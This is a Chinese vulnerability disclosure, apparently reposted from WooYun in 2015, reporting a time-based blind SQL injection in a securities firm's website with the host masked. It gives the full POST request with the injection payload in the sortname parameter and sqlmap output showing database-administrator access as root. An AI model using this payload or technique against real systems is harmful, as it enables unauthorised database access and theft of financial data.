记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

华金证券主站SQL注入漏洞(DBA权限/时间盲注root权限)

2015-11-07 02:40

URL:http://**.**.**.**/

测试注入:

code 区域
POST /creditTrans/searchList HTTP/1.1

Content-Length: 179

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://**.**.**.**/

Cookie: PHPSESSID=kdmgr839vmd0vh8u6ajkj9c4s2

Host: **.**.**.**

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*



module=2&page=1&rp=10&sortname=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&sortorder=desc&type=1



存在注入:

131.png

漏洞证明:

jinhua.png



权限:

code 区域
sqlmap resumed the following injection point(s) from stored session:

---

Parameter: #2* ((custom) POST)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: module=2&page=1&rp=10&sortname=(select(0)from(select(sleep(0)))v)/'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+" AND (SELECT * FROM (SELECT(SLEEP(5)))Jksr)-- xRQj/&sortorder=desc&type=1

---

[13:07:49] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.29

back-end DBMS: MySQL 5.0.12

[13:07:49] [INFO] testing if current user is DBA

[13:07:49] [INFO] fetching current user

[13:08:11] [INFO] adjusting time delay to 1 second due to good response times

root@localhost

current user is DBA: True

修复方案:

时间盲注 就不跑了 耗时间


知识来源: www.wooyun.org/bugs/wooyun-2015-0141938

阅读:200596 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“华金证券主站SQL注入漏洞(DBA权限/时间盲注root权限)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

↓赞助商 🙇🧎

标签云 ☁